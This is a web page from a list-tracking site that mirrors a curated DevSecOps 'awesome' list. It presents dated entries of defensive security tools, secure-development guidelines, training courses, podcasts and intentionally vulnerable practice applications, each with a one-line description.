Top 50 Awesome List

Higher Education

Higher Education

TaptuIT/awesome-devsecops

Security  19 days ago  638
Curating the best DevSecOps resources and tooling.
View byDAY/WEEK/README
View on Github

Jul 28th

Tools

Supply Chain Security

  • Harden Runner GitHub Actionstars93 - StepSecurity - installs a security agent on the GitHub-hosted runner (Ubuntu VM) to prevent exfiltration of credentials, detect compromised dependencies and build tools, and detect tampering of source code during the build.
  • Feb 7th

    Tools

    Multi-Platform

  • Terrascanstars3.2k - Accurics - Detect compliance and security violations across Infrastructure as Code to mitigate risk before provisioning cloud native infrastructure.
  • Jan 4th

    Tools

    Secrets Management

  • Keyscopestars345 - Spectral - Keyscope is an open source key and secret workflow tool (validation, invalidation, etc.) built in Rust.
  • Oct 19th, 2021

    Tools

    Dependency Management

  • Deepfence ThreatMapperstars1.8k - Apache v2, powerful runtime vulnerability scanner for kubernetes, virtual machines and serverless.
  • Oct 4th, 2021

    Tools

    Supply Chain Security

  • Sigstore - sigstore is a set of free to use and open source tools, including fulciostars346, cosignstars2.3k and rekorstars545, handling digital signing, verification and checks for provenance needed to make it safer to distribute and use open source software.
  • Tools

    Multi-Platform

  • Spectral DeepConfig - Spectral - Find misconfiguration both in infrastructure as well as apps as early as commit time.
  • Sep 28th, 2021

    Resources

    Wikis

  • SecureFlag Knowledge Base - OWASP - A repository of information about software vulnerabilities and how to prevent them.
  • Resources

    Secure Development Lifecycle Framework

  • Building Security In Maturity Model (BSIMM) - Synopsys - A framework for software security created by observing and analysing data from leading software security initiatives.
  • Resources

    Secure Development Guidelines

  • Fundamental Practices for Secure Software Development - SAFECode - Guidelines for implementing key secure development practices throughout the SDLC.
  • Sep 10th, 2021

    Resources

    Toolchains

  • Cloud Security and DevSecOps Best Practices and Securing Web Application Technologies (SWAT) Checklist - SANS - A poster containing the Securing Web Application Technologies (SWAT) Checklist, SANS Cloud Security Curriculum, Cloud Security Top 10, Top 12 Kubernetes Threats, and Secure DevOps Toolchain.
  • Jun 14th, 2021

    Tools

    Secrets Scanning

  • Detect Secretsstars2.4k - Yelp - An aptly named module for (surprise, surprise) detecting secrets within a code base.
  • May 28th, 2021

    Tools

    Supply Chain Security

  • Preflightstars131 - Spectral - helps you verify scripts and executables to mitigate supply chain attacks in your CI and other systems, such as in the recent Codecov hack.
  • Tools

    Secrets Management

  • Tellerstars957 - Spectral - A secrets management tool for developers - never leave your command line for secrets.
  • May 27th, 2021

    Tools

    Dynamic Analysis

  • Netzstars334 - Spectral - Discover internet-wide misconfigurations, using zgrab2 and others.
  • Tools

    Secrets Scanning

  • SpectralOps - Spectral - Automated code security, secrets, tokens and sensitive data scanning.
  • May 24th, 2021

    Tools

    Containers

  • Docker-Bench-Securitystars7.9k - Docker - The Docker Bench for Security is a script that checks for dozens of common best-practices around deploying Docker containers in production.
  • Tools

    Ansible

  • Ansible-Lintstars2.9k - Ansible Community - Checks playbooks for practices and behaviour that could potentially be improved. As a community backed project ansible-lint supports only the last two major versions of Ansible.
  • May 12th, 2021

    Tools

    Multi-Language Support

  • SemGrep - r2c - Semgrep is a fast, open-source, static analysis tool that finds bugs and enforces code standards at editor, commit, and CI time.
  • May 10th, 2021

    Resources

    Training

  • Application Security Educationstars57 - Duo Security - Training materials created by the Duo application security team, including introductory and advanced training presentations and hands-on labs.
  • Resources

    Books

  • Alice and Bob Learn Application Security - Tanya Janca - An accessible and thorough resource for anyone seeking to incorporate, from the beginning of the System Development Life Cycle, best security practices in software development.
  • Tools

    Secrets Scanning

  • CredScan - Microsoft - A credential scanning tool that can be run as a task in Azure DevOps pipelines.
  • GitGuardian - GitGuardian - A web-based solution that scans and monitors public and private git repositories for secrets.
  • Gitleaksstars10.4k - Zachary Rice - Gitleaks is a SAST tool for detecting hardcoded secrets like passwords, api keys, and tokens in git repositories.
  • git-secretsstars10.3k - AWS Labs - Scans commits, commit messages and merges for secrets. Native support for AWS secret patterns, but can be configured to support other patterns.
  • Nightfall - Nightfall - A web-based platform that monitors for sensitive data disclosure across several SDLC tools, including GitHub repositories.
  • Repo-supervisorstars574 - Auth0 - Secrets scanning tool that can run as a CLI, as a Docker container or in AWS Lambda.
  • truffleHogstars9k - Truffle Security - Searches through git repositories for secrets, digging deep into commit history and branches.
  • Apr 20th, 2021

    Tools

    Secrets Management

  • AWS Key Management Service (KMS) - Amazon AWS - Create and manage cryptographic keys in AWS.
  • AWS Secrets Manager - Amazon AWS - Securely store retrievable application secrets in AWS.
  • Apr 19th, 2021

    Resources

    Training

  • SafeStack - SafeStack - Security training for software development teams, designed to be accessible to individuals and small teams as well as larger organisations.
  • WeHackPuple - WeHackPurple - Online courses that teach application security theory and hands-on technical lessons.
  • Apr 6th, 2021

    Tools

    Multi-Platform

  • Checkovstars4.5k - Bridgecrew - Scan Terraform, AWS CloudFormation and Kubernetes templates for insecure configuration.
  • KICSstars1.1k - Checkmarx - Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle.
  • Mar 31st, 2021

    Tools

    Terraform

  • Terraform Compliance - terraform-compliance - A lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code.
  • Feb 18th, 2021

    Resources

    Toolchains

  • Periodic Table of DevOps Tools - XebiaLabs - A collection of DevSecOps tooling categorised by tool functionality.
  • Feb 3rd, 2021

    Tools

    Multi-Language Support

  • DevSkimstars718 - Microsoft - A set of IDE plugins, CLIs and other tools that provide security analysis for a number of programming languages.
  • Feb 2nd, 2021

    Tools

    Multi-Language Support

  • SonarLint - SonarSource - An IDE plugin that highlights potential security security issues, code quality issues and bugs.
  • Feb 1st, 2021

    Resources

    Training

  • Secure Code Warrior - Secure Code Warrior - Gamified and hands-on secure development training with support for courses, assessments and tournaments.
  • SecureFlag - OWASP - Hands-on secure coding training for Developers and Build/Release Engineers.
  • Jan 20th, 2021

    Tools

    Containers

  • Hadolintstars7.3k - Hadolint - Checks a Dockerfile against known rules and validates inline bash code in RUN statements.
  • Tools

    Terraform

  • Regulastars758 - Fugue - Evaluate Terraform infrastructure-as-code for potential security misconfigurations and compliance violations prior to deployment.
  • Jan 4th, 2021

    Resources

    Training

  • Practical DevSecOps - Practical DevSecOps - Learn DevSecOps concepts, tools, and techniques from industry experts with practical DevSecOps using state of the art browser-based labs.
  • Oct 8th, 2020

    Tools

    Containers

  • Trivystars13.1k - Aqua Security - Simple and comprehensive vulnerability scanner for containers.
  • Oct 1st, 2020

    Resources

    Wikis

  • DevSecOps Hub - Snyk - Introduction to key DevSecOps concepts, processes and technologies.
  • Sep 30th, 2020

    Tools

    Secrets Management

  • Gopassstars4.7k - Gopass - Password manager for teams relying on Git and gpg. Manages secrets in encrypted files and repositories.
  • Tools

    Multi-Language Support

  • Hawkeyestars358 - Hawkeyesec - Modularised CLI tool for project security, vulnerability and general risk highlighting.
  • Tools

    Containers

  • Anchore Engine - Anchore, Inc - Deep inspection of Docker images for CVEs and checking against custom policies. Engine behind their enterprise products that integrate against registries, orchestrators and CI/CD products.
  • Sep 2nd, 2020

    Tools

    Intentionally Vulnerable Applications

  • Cfngoatstars73 - Bridgecrew - Cloud Formation templates for creating stacks of intentionally insecure services in AWS. Ideal for testing the Cloud Formation Infrastructure as Code Analysis tools above.
  • Terragoatstars777 - Bridgecrew - Terraform templates for creating stacks of intentionally insecure services in AWS, Azure and GCP. Ideal for testing the Terraform Infrastructure as Code Analysis tools above.
  • Jul 8th, 2020

    Tools

    PHP

  • Phanstars5.3k - Phan - Broad static analysis for PHP applications with some support for security scanning features.
  • Jun 24th, 2020

    Tools

    Monitoring

  • Csper - Csper - A set of Content Security Policy tools that can test policies, monitor CSP reports and provide metrics and alerts.
  • Tools

    Threat Modelling

  • SecuriCAD - Forseeti - Treat modelling and attack simulations for IT infrastructure.
  • Awesome Threat Modellingstars723 - Practical DevSecOps - A curated list of threat modelling resources.
  • IriusRisk - IriusRisk - Draw threat models and capture threats and countermeasures and manage risk.
  • Raindance Projectstars38 - DevSecOps - Use attack maps to identify attack surface and adversary strategies that may lead to compromise.
  • SD Elements - Security Compass - Identify and rank threats, generate actionable tasks and track related tickets.
  • Threat Dragon - OWASP - Threat model diagramming tool.
  • Threat Modelling Tool - Microsoft - Threat model diagramming tool.
  • Threatspec - Threatspec - Define threat modelling as code.
  • Related Lists

  • Awesome Dynamic Analysisstars584 - Matthias Endler - A collection of dynamic analysis tools and code quality checkers.
  • Awesome Static Analysisstars10.1k - Matthias Endler - A collection of static analysis tools and code quality checkers.
  • Awesome Threat Modellingstars723 - Practical DevSecOps - A curated list of threat modeling resources.
  • Vulnerable Web Apps Directory - OWASP - A collection of vulnerable web applications for learning purposes.
  • Resources

    Articles

  • Our Approach to Employee Security Training - Pager Duty - Guidelines to running security training within an organisation.
  • Resources

    Communities

  • MyDevSecOps - Snyk - A community that runs conferences, a blog, a podcast and a Slack workspace dedicated to DevSecOps.
  • Resources

    Conferences

  • AppSec Day - OWASP - An Australian application security conference run by OWASP.
  • DevSecCon - Snyk - A network of DevSecOps conferences run by Snyk.
  • Resources

    Podcasts

  • Absolute AppSec - Seth Law & Ken Johnson - Discussions about current events and specific topics related to application security.
  • Application Security Podcast - Security Journey - Interviews with industry experts about specific application security concepts.
  • BeerSecOps - Aqua Security - Breaking down the silos of Dev, Sec and Ops, discussing topics that span these subject areas.
  • DevSecOps Podcast Series - OWASP - Discussions with thought leaders and practitioners to integrate security into the development lifecycle.
  • The Secure Developer - Snyk - Discussion about security tools and best practices for software developers.
  • Resources

    Secure Development Guidelines

  • Application Security Verification Standard - OWASP - A framework of security requirements and controls to help developers design and develop secure web applications.
  • Coding Standards - CERT - A collection of secure development standards for C, C++, Java and Android development.
  • Proactive Controls - OWASP - OWASP's list of top ten controls that should be implemented in every software development project.
  • Secure Coding Guidelines - Mozilla - A guideline containing specific secure development standards for secure web application development.
  • Secure Coding Practices Quick Reference Guide - OWASP - A checklist to verify that secure development standards have been followed.
  • Resources

    Secure Development Lifecycle Framework

  • Secure Development Lifecycle - Microsoft - A collection of tools and practices that serve as a framework for the secure development lifecycle.
  • Secure Software Development Framework - NIST - A framework consisting of practices, tasks and implementation examples for a secure development lifecycle.
  • Software Assurance Maturity Modelstars390 - OWASP - A framework to measure and improve the maturity of the secure development lifecycle.
  • Resources

    Training

  • Cybrary - Cybrary - Subscription based online courses with dedicated categories for cybersecurity and DevSecOps.
  • PentesterLab - PentesterLab - Hands on labs to understand and exploit simple and advanced web vulnerabilities.
  • Security Training for Engineers - Pager Duty - A presentation created and open-sourced by PagerDuty to provide security training to software engineers.
  • Security Training for Everyone - Pager Duty - A presentation created and open-sourced by PagerDuty to provide security training employees.
  • Web Security Academy - PortSwigger - A set of materials and labs to learn and exploit common web vulnerabilities.
  • Tools

    Dependency Management

  • Dependabot - GitHub - Automatically scan GitHub repositories for vulnerabilities and create pull requests to merge in patched dependencies.
  • Dependency-Check - OWASP - Scans dependencies for publicly disclosed vulnerabilities using CLI or build server plugins.
  • Dependency-Track - OWASP - Monitor the volume and severity of vulnerable dependencies across multiple projects over time.
  • JFrog XRay - JFrog - Security and compliance analysis for artifacts stored in JFrog Artifactory.
  • NPM Audit - NPM - Vulnerable package auditing for node packages built into the npm CLI.
  • Renovate - WhiteSource - Automatically monitor and update software dependencies for multiple frameworks and languages using a CLI or git repository apps.
  • Requires.io - Olivier Mansion & Alexis Tabary - Automated vulnerable dependency monitoring and upgrades for Python projects.
  • Snyk Open Source - Snyk - Automated vulnerable dependency monitoring and upgrades using Snyk's dedicated vulnerability database.
  • Tools

    Dynamic Analysis

  • Automatic API Attack Toolstars331 - Imperva - Perform automated security scanning against an API based on an API specification.
  • BurpSuite Enterprise Edition - PortSwigger - BurpSuite's web application vulnerability scanner used widely by penetration testers, modified with CI/CD integration and continuous monitoring over multiple web applications.
  • Gauntltstars920 - Gauntlt - A Behaviour Driven Development framework to run security scans using common security tools and test output, defined using Gherkin syntax.
  • SSL Labs Scanstars1.6k - SSL Labs - Automated scanning for SSL / TLS configuration issues.
  • Zed Attack Proxy (ZAP)stars9.7k - OWASP - An open-source web application vulnerability scanner, including an API for CI/CD integration.
  • Tools

    Cloud Formation

  • Cfn Nagstars1k - Stelligent - Scan AWS CloudFormation templates for insecure configuration.
  • Tools

    Containers

  • Clairstars8.9k - Quay - Scan App Container and Docker containers for publicly disclosed vulnerabilities.
  • Dagdastars983 - Elías Grande - Compares OS and software dependency versions installed in Docker containers with public vulnerability databases, and also performs virus scanning.
  • Snyk Container - Snyk - Scan Docker and Kubernetes applications for security vulnerabilities during CI/CD or via continuous monitoring.
  • Tools

    Terraform

  • Tfsecstars4.8k - Liam Galvin - Scan Terraform templates for security misconfiguration and noncompliance with AWS, Azure and GCP security best practice.
  • Tools

    Kubernetes

  • Kube-Scorestars1.8k - Gustav Westling - Scan Kubernetes object definitions for security and performance misconfiguration.
  • Kubectrl Kubesecstars415 - ControlPlane - Plugin for kubesec.io to perform security risk analysis for Kubernetes resources.
  • Tools

    Intentionally Vulnerable Applications

  • Bad SSLstars2.4k - The Chromium Project - A container running a number of webservers with poor SSL / TLS configuration. Useful for testing tooling.
  • Damn Vulnerable Web App - Ryan Dewhurst - A web application that provides a safe environment to understand and exploit common web vulnerabilities.
  • Juice Shopstars7.1k - OWASP - A web application containing the OWASP Top 10 security vulnerabilities and more.
  • NodeGoatstars1.6k - OWASP - A Node.js web application that demonstrates and provides ways to address common security vulnerabilities.
  • Vulnerable Web Apps Directory - OWASP - A collection of vulnerable web applications for learning purposes.
  • Tools

    Secrets Management

  • Ansible Vault - Ansible - Securely store secrets within Ansible pipelines.
  • Azure Key Vault - Microsoft Azure - Securely store secrets within Azure.
  • BlackBoxstars6.3k - StackExchange - Encrypt credentials within your code repository.
  • Chef Vaultstars410 - Chef - Securely store secrets within Chef.
  • CredStashstars2k - Fugue - Securely store secrets within AWS using KMS and DynamoDB.
  • CyberArk Application Access Manager - CyberArk - Secrets management for applications including secret rotation and auditing.
  • Docker Secrets - Docker - Store and manage access to secrets within a Docker swarm.
  • Git Secretsstars10.3k - Amazon AWS - Scan git repositories for secrets committed within code or commit messages.
  • Google Cloud Key Management Service (KMS) - Google Cloud Platform - Securely store secrets within GCP.
  • HashiCorp Vault - HashiCorp - Securely store secrets via UI, CLI or HTTP API.
  • Pinterest Knoxstars1.1k - Pinterest - Securely store, rotate and audit secrets.
  • Secrets Operations (SOPS)stars10.4k - Mozilla - Encrypt keys stored within YAML, JSON, ENV, INI and BINARY files.
  • Tools

    Multi-Language Support

  • Grauditstars1.1k - Eldar Marcussen - Grep source code for potential security flaws with custom or pre-configured regex signatures.
  • LGTM - Semmle - Scan and monitor code for security vulnerabilities using custom or built-in CodeQL queries.
  • RIPS - RIPS Technologies - Automated static analysis for PHP, Java and Node.js projects.
  • SonarQube - SonarSource - Scan code for security and quality issues with support for a wide variety of languages.
  • Tools

    C / C++

  • FlawFinderstars283 - David Wheeler - Scan C / C++ code for potential security weaknesses.
  • Tools

    C#

  • Puma Scanstars409 - Puma Security - A Visual Studio plugin to scan .NET projects for potential security flaws.
  • Tools

    Configuration Files

  • Confteststars2.3k - Instrumenta - Create custom tests to scan any configuration file for security flaws.
  • Tools

    Java

  • Deep Dive - Discotek.ca - Static analysis for JVM deployment units including Ear, War, Jar and APK.
  • Find Security Bugsstars1.9k - OWASP - SpotBugs plugin for security audits of Java web applications. Supports Eclipse, IntelliJ, Android Studio and SonarQube.
  • SpotBugsstars2.8k - SpotBugs - Static code analysis for Java applications.
  • Tools

    JavaScript

  • ESLint - JS Foundation - Linting tool for JavaScript with multiple security linting rules available.
  • Tools

    Go

  • Golang Security Checkerstars6.2k - securego - CLI tool to scan Go code for potential security flaws.
  • Tools

    .NET

  • Security Code Scanstars769 - Security Code Scan - Static code analysis for C# and VB.NET applications.
  • Tools

    PHP

  • PHPCS Security Auditstars633 - Floe - PHP static analysis with rules for PHP, Drupal 7 and PHP related CVEs.
  • Progpilotstars270 - Design Security - Static analysis for PHP source code.
  • Tools

    Python

  • Banditstars4.4k - Python Code Quality Authority - Find common security vulnerabilities in Python code.
  • Tools

    Ruby

  • Brakemanstars6.5k - Justin Collins - Static analysis tool which checks Ruby on Rails applications for security vulnerabilities.
  • DawnScannerstars671 - Paolo Perego - Security scanning for Ruby scripts and web application. Supports Ruby on Rails, Sinatra and Padrino frameworks.
  • Last Checked At: 2022-08-03T13:21:35.695Z
    Previous
    bakke92/awesome-gdpr
    Next
    dhondta/awesome-executable-packing

    About

    Track your favorite github awesome repo, not just star it. trackawesomelist.com provides website, newsletter, RSS for tracking the popular awesome list by daily and weekly.
    Contact us: [email protected]
    Track Awesome List - Track your favorite Github awesome repos, not just star them | Product Hunt

    Subscribe

    Subscribe to our weekly newsletter to receive the awesome updates! We never send spam and you can unsubscribe instantly with one click. Here's past issues.

    Links

    Follow us on TwitterSubscribe us on TelegramSubmit awesome list repoNewsletterDonateSitemap